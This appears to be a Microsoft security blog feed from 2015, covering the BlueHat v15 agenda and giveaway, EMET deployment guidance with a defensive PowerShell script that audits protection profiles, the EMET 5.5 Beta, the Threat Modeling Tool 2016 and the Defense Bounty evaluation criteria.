EKs often originate on trusted websites and target vulnerabilities in software used by our customers every day. Moreover, EK-based attacks do not require any user interaction—there's nothing to click, nothing to download—and infection is invisible. Approximately two-thirds of new malware is now being delivered by EKs, hardly surprising given that a single EK on a popular site can infect thousands of people in less than an hour. The recently analyzed Angler EK, for instance, was found to target almost 90,000 innocent victims each day, earning cyber criminals potentially more than $30 million annually and further proving the EK space to be an extremely financially lucrative one. But all isn't lost! Starting with the November release of Windows 10, Microsoft SmartScreen will begin protecting users from EK attacks in Internet Explorer and Microsoft Edge. In this talk, we will discuss the growing EK landscape, how it is impacting our customers, and how, with new synchronous blocks for EKs, SmartScreen once again aims to continue increasing the cost of exploitation for attackers.

4:00-4:50 PM | Mark Novak and Dave Probert |Microsoft          
Virtual Secure Mode and Shielded Virtual Machines

Virtual Secure Mode is a new virtualization-assisted security technology that made its debut in Windows 10.  This talk will describe the fascinating security properties of VSM as well as cover the two new technologies that were built with its help: shielded virtual machines and Credential Guard. Microsoft developers interested in utilizing VSM in their projects should talk to folks in the WDG.

Wednesday, January 13th, 2016 | General Audience  


9:00-9:50 AM |Nils Sommer|Bytegeist
Windows Kernel Fuzzing

Attackers often rely on Windows kernel vulnerabilities to break out of application sandboxes and escalate privileges. To rapidly identify such vulnerabilities, we adapted techniques from browser fuzzing to assess the kernel and have reported a number of critical issues to Microsoft. All aspects of the fuzzer, from test case generation to testcase minimisation are highly distributed and it produces high quality testcases for reproduction. This talk will discuss our approach for fuzz testing the Windows kernel, from assessing the kernel's attack surface and effective test case generation, to the design and architecture of a highly distributed fuzzer that scales to many hundreds of CPU cores.

10:00-10:50 AM | Leigh Honeywell and Ari Rubinstein | Slack   
Secure Development for Snake People: New Ideas for the Next Generation

Startups hear the word “process” and freak out – shipping code every day isn’t optional. What if you could build a secure development process that accelerated development, instead of slowing it down? At Slack, we have – allowing our small team to distribute security work to developers, and building up their security skills from intern to senior engineer. We’ll talk through the tools and processes we built – a flexible, open source framework including a lightweight self-service assessment tool, a checklist generator, and most importantly a chat-based process. Together, these encourage security thinking in the tools developers already spend their time in – allowing us to effortlessly document people’s thought processes around risk. By empowering developers to think about security themselves and incorporate secure practices into their own teams and workflows, we’ve defeated the fear of the checkbox and replaced it with new tooling and process that teams actually want to work with.

11:00-11:25 AM | Jason Shirk|Microsoft             
Microsoft Bounty Program: Making it to the MSRC Top 100

Microsoft has been working with security researchers for a long time as part of a robust security regimen, which we continue to value and drive passionately. Bug bounties are an increasingly important part of the vulnerability research and defense ecosystem. We believe that bounties will continue to evolve over time, and will be regularly managing the Microsoft Bounty Programs. In this talk Jason will be talking about what we've seen to date, what we've learned, and diving more deeply into the data behind running the Bug Bounty Programs at Microsoft.

11:30-11:55 AM | Eugene Bobukh|Microsoft    
Transcending Threat Modeling Limitations

Threat Modeling as we know it today has inherent scalability limitations. It can be shown that its computational complexity is O(N^2) with respect to the number of elements modeled. In everyday practice that places an upper limit for human driven threat modeling at approximately 20 elements. However, contemporary software is significantly more complex, consisting of thousands of logical components. What options are available to transcend that limitation? In this talk we shall explore some experimental approaches for scalable threat modeling.


1:00-1:50 PM | Anna Chung | Uber
The Glocalization of the Underground Market

Starting with a general introduction to the Chinese-speaking cybercrime underground market, this presentation aims to discuss how international hacking tools and compromised data are being used by financially motivated criminals, and what kind of adjustments were made in order to localize the business model. The talk will use cybercrime activities targeting the Japanese online banking system, and possibly the spread of web-based DDoS tools, to explain the state of glocalization in the Chinese underground economy.

2:00-2:50 PM | Nicolas Joly |Microsoft

Although Windows has a long history of vulnerabilities and exploit techniques, Windows Phone OS has proven to be much harder to exploit than its cousin. Low market share, little public research, a high focus on iOS and Android, but also strong security policies made that target highly resistant to massive pwnage. But as often happens with exploits, a good vulnerability such as a write-what-where condition is usually enough to defeat all mitigations in place. Based on research conducted for mobile Pwn2Own 2014, this talk will depict the road taken to get a working exploit for Internet Explorer Mobile running on WP 8.1.

3:00-3:50 PM | Kostya Kortchinsky | Google
VMware Workstation Escape: the Virtual Printer Case

VM Escapes, or how to execute code on the Host OS from a Guest. While they are not a new concept, they are increasingly attractive as virtualization expands, in the datacenters and elsewhere.
This presentation, focusing on VMware Workstation, will demonstrate how arbitrary code execution in the Host was achieved from the Guest through memory corruption vulnerabilities in VMware Workstation Printer Virtualization.
I will cover the virtual printer protocol, how to fuzz it, the vulnerabilities uncovered (through fuzzing and reading the assembly code), and finally walk through a fully working exploit for Workstation 11.1.0 on a Windows 8.1 Host.


4:00-4:50 PM | Matt Miller and David Weston | Microsoft
The Cutting Edge of Web Browser Exploitation

Web browsers are the primary portal to the Internet for most people and it is no surprise that they continue to be one of the most preferred infection vectors for targeted and large scale attacks in-the-wild. Over the past few years, Microsoft has observed some significant changes in the trends related to how browser-based vulnerabilities are discovered and exploited in practice. In this presentation, we will explore these trends and dig into the technical details of how browser-based vulnerability exploitation has changed over the past 15 years. We will show how Microsoft has responded to these changes in the threat landscape by showcasing some of the major security investments that have been made in Windows, Internet Explorer, and the Microsoft Edge browser. We will provide an objective assessment of the impact that these investments have had thus far and explain how these hardening measures, particularly in the Microsoft Edge browser, have significantly affected the playbook that attackers have developed for exploiting browser-based vulnerabilities.


**PLEASE NOTE: This schedule may be subject to change but we will endeavor to keep the final schedule as close as possible to what appears here.



BlueHat v15 End-of Event Survey Give-Away Rules

At the end of each conference day, please ensure you complete the End-of-Event survey located at:  

As part of the Microsoft BlueHat v15 Conference, Microsoft will conduct a give-away of prizes described in the prizes section below. A reconciliation of attendees and end of event survey completions will occur to determine eligible participants. Any duplications will be removed as only one entry per person is allowed. A random drawing by a disinterested party will occur based on the list of eligible personnel who have submitted their end of event surveys by Midnight on 1/18/2016. All decisions regarding winners by the event organizers are final.

Prizes: As part of the BlueHat Conference, Microsoft will select one individual to receive a Microsoft Xbox One valued at $399 and 10 individuals to receive a Starbucks gift card valued at $10 each.

Eligibility: The give-away is open to all the BlueHat v15 attendees (to External attendees, Microsoft FTEs and Interns, and Contingent Staff) who attend the conference either in person or via Live Streaming, and COMPLETE the End of Event Surveys. Personnel who are unable to attend due to technical issues, geography, or other events that prohibit attendance are not eligible. Additionally, personnel who view only the On Demand videos after the event and event organizers are not eligible.

Any questions regarding this give-away should be sent to

BlueHat v15 Give-Away Winners

Microsoft Xbox One Winner

Christian Kuhtz

$10 Starbucks Gift Card Winners
Rich Eicher
Nate Warfield
Marius Bunescu
Max Poliashenko
John Bambenek
Roman Golovin
Samuel Jenkins
Neil Coles
Chris Kaler
Angie Wilson

BlueHat v15 Full Agenda_Jan12-13.pdf

EMET: To be, or not to be, A Server-Based Protection Mechanism, 20 Oct 2015 15:27:00 +0000 Folks – Platforms PFE Dan Cuomo here to discuss a common question seen in the field:

“My customer is deploying EMET and would like to know if it is supported on Server Operating Systems.”

On the surface there is a simple answer to this question, however with a little poking, a little prodding, the question quickly becomes:

“Does EMET protect Server workloads?”

This is a more complicated question that usually incurs some email-based eye-rolling when we tell them, like most questions, “It depends.”  They really didn’t mean to ask that question either and so after some more poking, and some more prodding, a number of different questions are uncovered, all of which require a little more analysis than the typical “YES” or “NO” question.  So in the next few paragraphs we’ll discuss the reasons for this question, and how to have this conversation with decision makers in the organization.

Is EMET Supported on Server Operating Systems?

The simple answer to the server support question is an emphatic “YES!”  As you can see in the EMET support article (summary below), EMET 5.2 can be installed on most currently supported operating systems (as of the writing of this article) and their derivatives.  For example, the client OSes Windows 7, 8, and 8.1 are all supported, as are the server OSes 2008, 2008 R2, 2012, and 2012 R2. (Note that EMET 5.5 Beta provides support for Windows 10.)

Operating System (min supported) | EMET 5.2
Windows 10
Windows 8.1
Windows 8
Windows Server 2012 R2
Windows Server 2012
Windows 7 Service Pack 1
Windows Server 2008 R2 Service Pack 1
Windows Server 2008 Service Pack 2
Windows Vista Service Pack 2


[Short and Sweet]:

Q: Is EMET Supported on server Operating Systems?

A: Yes, EMET is supported on currently supported server Operating Systems

Can EMET Protect My Legacy Server Operating Systems?

One reason customers consider deploying EMET is to protect their legacy systems such as Windows XP (EoL: April 8th, 2014) and Server 2003 (EoL: July 14th, 2015).  Many customers may still be wondering if they really need to migrate or even how to get started.  This link and this Tech Ed video, It’s the End of the World As You Know It…Windows Server 2003 End of Life, will give you a bunch of great information.  If you want the Cliffsnotes: yes, you REALLY need to migrate; one thing you won’t find on this page is a link to download EMET.

You may be wondering if you can avoid migrating a legacy system to a newer, supported operating system if you install EMET.  The absence of EMET from the prior links as well as this video should make it abundantly clear that the answer is “NO.”  You still need to migrate off of the legacy operating systems.  In addition, once the server operating system goes out of support, EMET is no longer supported on that platform.  For example, now that we’ve passed July 14th, any remaining 2003 systems in your enterprise are no longer supported.  Likewise, the EMET application on those systems is also unsupported.

EMET primarily mitigates user-mode application exploits that target applications like Microsoft Office, Internet Explorer, and Adobe Acrobat.  As such, it may provide some additional protection while you’re migrating, however it will not protect you against all exploits targeted at this legacy platform and it is certainly not a long-term “silver-bullet” to enterprise security.  Your safest course of action is to upgrade those legacy systems to a newer, supported operating system.

Note: Having just read that last sentence, many of you are currently misinterpreting what I said as proof that you don’t really need to upgrade if you have a mission critical application that only runs on a legacy OS.  STOP IT!!!

All joking aside, I will tell you that nearly every customer I have encountered thinks they’re the exception to the rule.  In reality, there are few actual exceptions.  If you don’t know what to do or how to get started, I implore you to contact us to see how we can help you.

[Short and Sweet]:

Q: Will EMET protect your legacy operating system?

A: Nope.  While EMET could mitigate some potential vulnerabilities on a legacy system, it should not be considered a long-term alternative to migrating to a supported OS.

What should I protect with EMET?

OK, let’s recap.  We now know EMET can be installed on supported server operating systems.  In addition, it can provide some level of protection while you’re migrating off a legacy OS.  But what applications should you configure EMET to protect in these environments?

When considering an application protection strategy, keep in mind that “agents” are most likely already sprawling throughout your enterprise, consuming valuable system resources.  I’ve regularly heard customers say, “Not another agent!?”  With this in mind, focus on a risk-management based approach.  This would include applications that are:

1) Most likely to be exploited

2) Consuming content from external or untrusted sources

Most likely to be exploited:

In addition to being the least desirable high school yearbook award, this category describes applications that are highly targeted by attackers.  This often boils down to the widespread use of an application.  Protecting applications that attackers believe yield a high reward (for example, those that affect many people) should be considered essential.

An example of this would be Microsoft Word or Adobe Acrobat.  Both of these applications have a large user base.  An attacker would know that if successful, the exploit would affect many customers.  In contrast, an exploit that targets a “home-grown” LOB application would yield a low-reward.

Applications consuming content from external or untrusted sources

This category describes applications that consume or access content from an external or untrusted source such as the internet.  For example, both Microsoft Word and Adobe Acrobat handle “untrusted” content when a user downloads and opens *.docx or *.pdf from the internet.  However, opening *.docx or *.pdf from an intranet SharePoint site is of low risk.  Another example would be any web browser that has access to the internet.

When you first configure EMET you’re greeted with the wizard shown below:

If you select the option to “Use Recommended Settings” (shown above), you are, among other things, configuring EMET to use the “Recommended Software.xml” protection profile included with the installer.  The included applications (shown below) are recommended by the EMET Product Group and have gone through testing to verify that, by and large, the mitigations selected will reduce the number of false positives and incompatibilities incurred with EMET.

Note: False-positives and incompatibilities are likely to occur as many applications make use of the exact behavior that the mitigations intend to block.  Please review EMET mitigation guidelines for a list of known application mitigation compatibility issues. 

Please also review Kurt Falde’s article on Troubleshooting an EMET Mitigation Application Crash for information on what to do when you find an incompatible application mitigation.

It is imperative to thoroughly test your configuration making sure that the pilot contains a good representation of target systems.  For example, make sure to include all necessary plug-ins or add-ins to applications that will be encountered in the enterprise for both client and server operating systems.

The included protection profiles are a great low-risk way to get started.  These profiles contain the “low-hanging fruit” and provide the biggest gains.  The applications included in the recommended software protection profile (shown below) cover a range of popular applications and those that consume external or untrusted content.

The popular protection profile is a superset of the recommended protection profile.  It adds a number of additional applications that fit the same bill.  Once you’ve tested the applications in the recommended list, test the applications in the popular list against a group of machines that are representative of your target environment.

[Short and Sweet]:

Q: What should you protect with EMET?

A: Stick to the applications in the recommended and popular protection profiles.  These include applications that have been tested, are widespread, and may handle external or untrusted content.

What about generic Microsoft processes?

Nope.  Technically speaking, you can ask EMET to protect any application that runs on a system.  However, keep in mind that these additional applications have not been tested and may not behave as expected.  We specifically call this out in the EMET mitigations guidelines, “System and network services are also out-of-scope for EMET. Although it is technically possible to protect these services by using EMET, we do not advise you to do this.”

This includes servers that you really care about, like domain controllers.  Between you and me, if you’re thinking about protecting LSASS.EXE or MSExchangeIS.exe, this is what we in “the biz” call an “RGE” (resume generating event).  Put down the mouse and step away slowly…
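As an added example (not code from Dan's post or from EMET itself), here is a PowerShell check that applies the two points above to a protection profile before a pilot: it parses the profile, reports which protected executables actually exist on the pilot machine so you know the pilot can exercise them, and flags any out-of-scope system or network service that someone has added. The profile layout (EMET_Apps/AppConfig/Mitigation elements) is my recollection of the EMET 5 format, so verify the element names against a profile exported from your own install; the sample profile and pilot inventory are constructed.

```powershell
# Added example (not from the original post or from EMET): audit an EMET protection
# profile against a pilot machine before rollout.
# Assumption: the profile uses the EMET 5 layout as I recall it:
#   <EMET><EMET_Apps><AppConfig Path=".." Executable=".."><Mitigation Name=".." Enabled=".."/>
# Check the element names against a profile exported from your own EMET install.
# The sample profile and pilot inventory below are constructed for this example.

$SampleProfile = @"
<?xml version="1.0" encoding="utf-8"?>
<EMET Version="5.2">
  <EMET_Apps>
    <AppConfig Path="*\Microsoft Office\Office*" Executable="WINWORD.EXE">
      <Mitigation Name="DEP" Enabled="true" />
      <Mitigation Name="EAF" Enabled="true" />
      <Mitigation Name="Caller" Enabled="false" />
    </AppConfig>
    <AppConfig Path="*\Adobe\Reader*" Executable="AcroRd32.exe">
      <Mitigation Name="DEP" Enabled="true" />
      <Mitigation Name="ASR" Enabled="true" />
    </AppConfig>
    <AppConfig Path="*\Windows\System32" Executable="lsass.exe">
      <Mitigation Name="DEP" Enabled="true" />
    </AppConfig>
  </EMET_Apps>
</EMET>
"@

# System and network services the post says should never be in a profile. Extend as needed.
$OutOfScopeExecutables = @('lsass.exe', 'services.exe', 'svchost.exe', 'MSExchangeIS.exe')

function Get-InstalledExecutables {
    # Enumerate *.exe files under the Program Files directories of this machine.
    $roots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}) |
        Where-Object { $_ -and (Test-Path -LiteralPath $_) }
    Get-ChildItem -Path $roots -Recurse -Filter *.exe -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty FullName
}

function Test-EmetProfile {
    param(
        [Parameter(Mandatory)] [string] $ProfileXml,
        [string[]] $InstalledExecutables = (Get-InstalledExecutables),
        [string[]] $OutOfScope = $OutOfScopeExecutables
    )
    [xml] $doc = $ProfileXml
    foreach ($app in @($doc.EMET.EMET_Apps.AppConfig)) {
        # EMET's Path attribute is a wildcard; -like applies the same wildcard semantics.
        $pattern = "$($app.Path)\$($app.Executable)"
        $found   = @($InstalledExecutables | Where-Object { $_ -like $pattern })
        $enabled = @($app.Mitigation | Where-Object { $_.Enabled -eq 'true' })
        [pscustomobject]@{
            Executable         = $app.Executable
            PathPattern        = $app.Path
            EnabledMitigations = ($enabled | ForEach-Object { $_.Name }) -join ','
            PresentOnPilot     = ($found.Count -gt 0)
            OutOfScope         = ($OutOfScope -contains $app.Executable)
        }
    }
}

# Offline run against a constructed pilot inventory (Word installed, Acrobat Reader missing).
$PilotInventory = @(
    'C:\Program Files\Microsoft Office\Office15\WINWORD.EXE',
    'C:\Windows\System32\lsass.exe'
)
$report = Test-EmetProfile -ProfileXml $SampleProfile -InstalledExecutables $PilotInventory
$report | Format-Table -AutoSize

# Gate the rollout: refuse out-of-scope entries, warn where the pilot cannot exercise an entry.
foreach ($row in $report) {
    if ($row.OutOfScope) {
        Write-Error "Out-of-scope service in profile: $($row.Executable); remove it before deployment"
    }
    elseif (-not $row.PresentOnPilot) {
        Write-Warning "$($row.Executable) is in the profile but not on this pilot machine; its mitigations stay untested here"
    }
}
```

Omit the -InstalledExecutables argument to scan the Program Files directories of the machine the script runs on instead of the constructed inventory.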

[Short and Sweet]:

Q: What about generic Microsoft processes?

A: Nope, stick to the applications in the recommended and popular profile lists.

What else should I consider?

Some of you savvy readers out there are probably saying to yourself,

“Now hold the phone, Dan.  We follow pretty stringent guidelines about what does or does not get installed on servers.  We have enforced rules that prevent the installation of the applications listed in the protection profiles.”

“In fact, we even make sure that administrative users are unable to reach the internet from servers.  We’re confident that none of the applications you spoke of previously will reach our servers.”

Before completely discarding EMET, it’s important to note that EMET does provide other capabilities that you may be able to leverage, such as certificate trust pinning.  However, if you can honestly tell me that there is no way that those applications will get installed on your systems and that they can never come in contact with untrusted content, you may not need EMET on your servers.  On a side-note, if you’re looking for a PFE, I know someone who would love to work in an environment like that :)

It’s to these customers I usually recommend a Microsoft Security Risk Assessment (#ShamelessPlug) or other security assessment that helps make sure that your perception is reality.  Some of the best advice I’ve been given is, “trust, but verify.”

In contrast, perhaps your team is just too big, or too widespread.  Maybe you don’t have the necessary process, procedure, or technology to eliminate this risk in your server environment.  In cases like these I would advise rolling out EMET to your server infrastructure as well.

[Short and Sweet]:

Q: What else should I consider?

A: Look at your IT team structure.  Review your processes and procedures.  Have a third party look at them.  Verify EMET can’t help you before you decide you don’t need it!


As you have now seen, this seemingly simple question spirals into a complicated one very quickly.  EMET is supported on servers, and can be used to enhance security across a wide range of platforms.  Use the built-in protection profiles as a baseline and thoroughly test your target systems prior to deployment.

Lastly, if your technology, process, and procedures for server security are foolproof, then feel free to focus your efforts elsewhere.  Otherwise consider EMET part of your IT security “flu-shot.”  Take the time now and roll it out before you have a problem.

Thanks for reading,

Dan Cuomo


Enhanced Mitigation Experience Toolkit (EMET) version 5.5 Beta is now available, 15 Oct 2015 16:13:23 +0000

The Enhanced Mitigation Experience Toolkit (EMET) benefits enterprises and all computer users by helping to protect against security threats and breaches that can disrupt businesses and daily lives. It does this by anticipating, diverting, terminating, blocking, or otherwise invalidating the most common actions and techniques adversaries might use to compromise a computer. In this way, EMET can help protect your computer systems even from new and undiscovered threats before they are formally addressed by security updates and antimalware software.

EMET 5.5 Beta release includes new functionality and updates from EMET 5.2, including:

  • Windows 10 compatibility
  • Better configuration of various mitigations via GPO
  • EAF/EAF+ pseudo-mitigation performance improvements
  • Support for Windows 10’s new Untrusted font mitigation
  • Various bug fixes


Benefits of EMET

Helps raise the bar against attackers. EMET helps protect against new and undiscovered threats even before they are formally addressed through security updates or antimalware software. EMET includes many security mitigations that complement other defense in-depth security measures, such as Windows Defender and antivirus software. EMET installs with default protection profiles, which are XML files that contain preconfigured settings for common Microsoft and third-party applications.

Works well for the enterprise. Enterprise IT professionals can easily deploy EMET through Microsoft System Center Configuration Manager and apply Group Policies in Windows Active Directory to comply with enterprise account, user, and role policies. EMET is highly customizable and administrators can choose which applications to protect with each mitigation technique.

EMET can even provide mitigation protections for legacy enterprise software that cannot easily be rewritten, or where the source code is not available.

The reporting capabilities in EMET are provided through a component called the EMET Agent, which allows enterprises to create logs and notifications for audit purposes. EMET customer support is available through Microsoft Premier Support Services. For more information on deploying EMET, visit the EMET Knowledge Base Article: KB2458544

Helps protect in a wide range of scenarios. EMET works for a range of Windows client and server operating systems and is compatible with most commonly used third-party applications, from productivity software to music players. When users browse secure HTTPS sites on the Internet or log on to popular social media sites, EMET can help further protect by validating Secure Sockets Layer (SSL) certificates against a set of administrator-defined rules.

Security mitigation technologies are designed to make it more difficult for an attacker to exploit vulnerabilities in a given piece of software. EMET enables customers to leverage these security mitigation technologies on their systems and provides several unique benefits:

No source code needed: EMET enables administrators to apply several of the mitigations built into Windows (such as Data Execution Prevention) to individual applications without recompilation. This is especially useful for deploying mitigations on legacy software that was written before the mitigations existed, or when source code is not available.

Highly configurable: EMET provides a high degree of granularity by allowing mitigations to be individually applied on a per process basis. There is no need to enable the mitigations on an entire product or suite of applications. This is helpful in situations where a process is not compatible with a particular mitigation technology. When that happens, the administrator can simply turn that mitigation off for that process.

Helps harden legacy applications: It’s not uncommon to have a hard dependency on old legacy software that cannot easily be rewritten and needs to be phased out slowly. Unfortunately, this can easily pose a security risk as legacy software is notorious for having security vulnerabilities. While the real solution to this is migrating away from the legacy software, EMET can help manage the risk while this is occurring by making it harder for hackers to exploit vulnerabilities in the legacy software.

Helps verify SSL certificate trust while surfing websites: Given the increase in incidents of Certificate Authorities issuing fraudulent SSL certificates that are then used for man-in-the-middle attacks, EMET can enforce a set of pinning rules that verify the SSL certificates of specified domains against their expected issuing Root CA (configurable certificate pinning).

Allows granular plugin ‘deny list’ within applications: Modules and plugins, when loaded into an application, can increase its exposure to vulnerabilities and, consequently, to potential attacks. EMET addresses this by allowing the administrator to create ‘deny lists’ to prevent unwanted modules and plugins from loading within an application.

Ease of use: The policy for system wide mitigations can be seen and configured with EMET's graphical user interface, the command line tool or via Group Policy. There is no need to locate and decipher registry keys, or run platform dependent utilities. With EMET it is possible to adjust settings with a consistent interface regardless of the underlying platform.

The toolkit includes several pseudo mitigation technologies aimed at disrupting current exploit techniques. These pseudo mitigations are not robust enough to stop future exploit techniques, but can help prevent systems from being compromised by many of the exploits currently in use. The mitigations are also designed so that they can be easily updated as attackers start using new exploit techniques.

Mitigations in Windows 10

One of EMET’s original goals was to be a testbed for mitigations to add to the operating system. With Windows 10 we have implemented many features and mitigations that can make EMET unnecessary on devices running Windows 10. EMET is most useful to help protect down-level systems, legacy applications, and to provide Anti-ROP protection for 3rd party software that may not yet be recompiled using CFG.

Some of the Windows 10 features that provide equivalent (or better) mitigations than EMET are:

Device Guard: Device Guard is a combination of enterprise-related hardware and software security features that, when configured together, will lock a device down so that it can only run trusted applications. Device Guard provides hardware-based zero day protection for all software running in kernel mode, thus protecting the device and Device Guard itself from tampering, and app control policies that prevent untrusted software from running on the device.

Control Flow Guard (CFG): When an application is compiled with CFG, the compiler identifies the set of functions that are valid targets of indirect calls and records that set in the binary (in extra load-configuration data structures, the ones a dumpbin /loadconfig display shows). It also inserts a check before every indirect call that verifies the target is one of those expected, safe locations. If that check fails at run time, the operating system terminates the process.

AppLocker: AppLocker is an application control feature introduced in Windows 7 that helps prevent the execution of unwanted and unknown applications within an organization's network while providing security, operational, and compliance benefits. AppLocker can be used in isolation or in combination with Device Guard to control which apps from trusted publishers are allowed to run.

For more information on Windows 10 security features please review the Windows 10 Security overview whitepaper on TechNet.

EMET 5.5 Beta and Edge

Given the advanced technologies used to protect Microsoft Edge, including industry leading sandboxing, compiler, and memory management techniques, EMET 5.5 mitigations do not apply to Edge.


We welcome feedback via Microsoft Connect.

Install EMET 5.5 Beta today!

We want to particularly thank FireEye for partnering with us.


Announcing BlueHat v15 Conference, 14 Oct 2015 15:33:22 +0000 We are happy to announce the 15th version of the Microsoft BlueHat Security Conference, set for January 12-13, 2016. The annual security conference brings internal and external speakers to educate and engage Microsoft’s engineering community and their executives. Work is currently under way to set the schedule for this event. Attendance at BlueHat is open to Microsoft full-time employees, contingent staff, and invited researchers, luminaries, partners, and customers.

Call for Papers

The Content Advisory Board invites thought leaders, security experts, and partners to submit original and challenging content for the security conference. From your research to perspectives and ideas, we are looking for content that will engage the engineering-focused audience and executives. We particularly invite submissions that have specific calls to action. This year we would like to focus content around the following topics:

  • Public, Dedicated, or Hybrid Cloud service security

  • Mobile Application Security

  • Advanced Persistent Threats & Threat Intelligence

  • Mitigation and Sandbox Escapes or Defenses

  • Authentication Technologies

  • Consumer Privacy

  • New Attack Surface Areas

A limited number of presentation slots are available, and all submissions will be reviewed by the Content Advisory Board on a rolling basis until all slots are filled. We ask that all submissions be presented in abstract form no later than October 31st. Deadlines for full content will follow in December. Presentations should target a 30- or 60-minute format with no more than three speakers specified. Some presentations will also be selected for a smaller-format session with Microsoft executives in addition to the main event. Speakers will be informed of their acceptance via email.

Submit your presentation abstracts to to be considered as a potential BlueHat speaker!

Conference Registration

Attendance at BlueHat v15 Conference is by invitation only. All invited attendees will receive an email with registration link and conference agenda in November.

What’s New with Microsoft Threat Modeling Tool 2016, 08 Oct 2015 02:02:27 +0000 Threat modeling is an invaluable part of the Security Development Lifecycle (SDL) process. We have discussed in the past how applying a structured approach to threat scenarios during the design phase of development helps teams more effectively and less expensively identify security vulnerabilities, determine risks from those threats, and establish appropriate mitigations.

The Microsoft Threat Modeling Tool 2016 is a free tool to help you find threats in the design phase of software projects. It’s available as a free download from the Microsoft Download Center. This latest release simplifies working with threats and provides a new editor for defining your own threats. Microsoft Threat Modeling Tool 2016 has several improvements.

  • New Threat Grid
  • Template Editor
  • Migrating Existing Data Flow Diagrams

New Threat Grid

The threat grid has been overhauled. Now you can sort and filter on any column. You can easily filter the grid to show threats for any flow. You can sort on the interaction column if you want to group all the threats for each flow. You can sort on the changed by column if you want to find that threat you just edited.

Template Editor

Microsoft Threat Modeling Tool 2016 comes with a base set of threat definitions organized by STRIDE category. These are suggested threat definitions and mitigations, generated automatically from your data flow diagram to show potential security vulnerabilities. To offer more flexibility, Microsoft Threat Modeling Tool 2016 gives users the option to add their own threats specific to their domain: users can extend the base set of threat definitions using the template editor.

The template editor also allows users to modify the stencils available on the drawing surface.  If you have a stencil you would like to make available for your DFDs, you can add it.  If you need another stencil property, you can add that.

Migrating Existing Data Flow Diagrams

Threat modeling is an iterative process. Development teams create threat models which evolve over time as systems and threats change. We wanted to make sure the new version supports this flow. Microsoft Threat Modeling Tool 2016 will load any threat model from Microsoft Threat Modeling Tool 2014, in the .tm4 format. Threat models created with version 3 of the tool (.tms format) must be migrated to the Microsoft Threat Modeling Tool 2014 format (.tm4) before they can be loaded in Microsoft Threat Modeling Tool 2016. Microsoft Threat Modeling Tool 2014 offers a migration tool for threat models created with version 3.1.8. (NOTE: For migrating threat models from v3.1.8 only, Microsoft Visio 2007 or later is required.)

Additional Information

We hope these new enhancements in Microsoft Threat Modeling Tool 2016 will provide greater flexibility and help enable you to effectively implement the SDL process in your organization.

Thank you to all who helped in shipping this release through internal and external feedback. Your input was critical to improving the tool and customer experience.

For more information and additional resources, visit:


Alex Armanasu is an Engineer on the Secure Development Tools team at Microsoft. He’s responsible for the Threat Modeling component of the Security Development Lifecycle (SDL).

What makes a good Microsoft Defense Bounty submission?, 08 Sep 2015 09:57:37 +0000 One of Microsoft’s longstanding strategies for improving software security is investing in defensive technologies that make it difficult and costly for attackers to exploit vulnerabilities. These solutions generally have a broad and long-lasting impact on software security because they focus on eliminating classes of vulnerabilities or breaking the exploitation primitives that attackers rely on. This also improves software security over the long run because it shifts the focus away from the hand-to-hand combat of finding, fixing, and servicing individual vulnerabilities and instead accepts the fact that complex software will undoubtedly have vulnerabilities.

To further emphasize our commitment to this strategy and to cast a wider net for defensive ideas, Microsoft awarded the BlueHat Prize in 2012 and subsequently started the ongoing Microsoft Defense Bounty in June 2013, which has offered up to $50,000 USD for novel defensive solutions. Last month, we announced that we will now award up to $100,000 USD for qualifying Microsoft Defense Bounty submissions. This increase further affirms the value that we place on these types of defensive solutions, and we’re hopeful it will encourage more research into practical defenses.

In this blog post, we wanted to take this opportunity to explain how we evaluate defensive solutions and describe the characteristics that we look for in a good defense. There are a few key dimensions that we evaluate solutions based on, specifically: robustness, performance, compatibility, agility, and adoptability. Keeping these dimensions in mind when developing a defense should increase the likelihood of the defense being deemed a good candidate for the Microsoft Defense Bounty and will also go a long way toward increasing the likelihood of the defense being integrated and adopted in practice.

Criteria for evaluating defensive solutions


Robustness

The first and most important criterion concerns the security impact of the defense. After all, a defense must make it appreciably more difficult and costly to exploit vulnerabilities in order to be worth pursuing.

We evaluate robustness in terms of:

  • The impact the defense will have on modern classes of vulnerabilities and/or exploits.  A good defense should eliminate a common vulnerability class or break a key exploitation technique or primitive used by modern exploits. 

  • The level of difficulty that attackers will face when adapting to the defense.  A good defense should include a rigorous analysis of the limitations of the defense and how attackers are likely to adapt to it. Defenses that offer only a small impediment to attackers are unlikely to qualify.


Performance

The second most important criterion concerns the impact the defense is expected to have on performance. Our customers expect Windows and the applications that run on it to be highly responsive and performant. In most cases, the scenarios where we are most interested in applying defenses (e.g. web browsers) are the same places where high performance is expected. As such, it is critical that defenses have minimal impact on performance and that the robustness of a defense justifies any performance cost it does impose.

Since performance impact is measured across multiple dimensions, it is not possible to simply distill the requirements down into a single allowed regression percentage. Instead, we evaluate performance in context using the following guide posts:

  • Impact on industry standard benchmarks. There are various industry standard benchmarks that evaluate performance in common application workloads (e.g. browser DOM/JS benchmarks). Although SPEC CPU benchmarks can provide a good baseline for comparing defense solutions, we find that it is critical to evaluate performance impact under real-world application workloads. 

  • Impact on runtime performance. This is measured in terms of CPU time and elapsed time either in the context of benchmarks or in common application scenarios (e.g. navigating to top websites in a browser). Defenses with low impact on runtime performance will rate higher in our assessment. 

  • Impact on memory performance. This is measured in terms of the how the defense affects various aspects of memory footprint including commit, working set, and code size. Defenses with low impact on memory performance will rate higher in our assessment.


Compatibility

One of the reasons Windows has been such a successful platform is the care taken to retain binary compatibility with existing applications. As such, it is critical that defenses retain compatibility with existing applications, or that there is a path for enabling the defense on an opt-in basis. Rebuilding the world (i.e. all binaries that run on Windows) is not an option for us in general, so defenses are expected to be 100% compatible in order to rate highly in our assessment.

In particular, we evaluate compatibility in terms of the following:

  • Binary interoperability. Any defense must be compatible with legacy applications/binaries or it must support enabling the defense on an opt-in basis.  If an opt-in model is pursued, then the defense must generally support legacy binaries (such as legacy DLLs) being loaded by an application that enables the defense. In the case where the defense requires binaries to be rebuilt in order to be protected, the protected binaries must be able to be loaded on legacy versions of Windows that may not support the defense at runtime. 

  • ABI compliant. Related to the above, any defense that alters code generation or runtime interfaces must be compliant with the ABI (e.g. cannot break calling conventions or other established contracts). For example, details on the x64 ABI for Windows can be found here

  • No false positives. Defenses must not make use of heuristics or other logic that may be prone to false positives (and thus result in application compatibility issues).


Agility

Given the importance of binary compatibility and the long-term implications of design decisions, we also need to ensure that we retain as much flexibility as possible to change a defense in the future. We therefore pay close attention to the agility of a defense’s design and implementation. Defenses with good agility properties are likely to rate higher in our assessment.


Adoptability

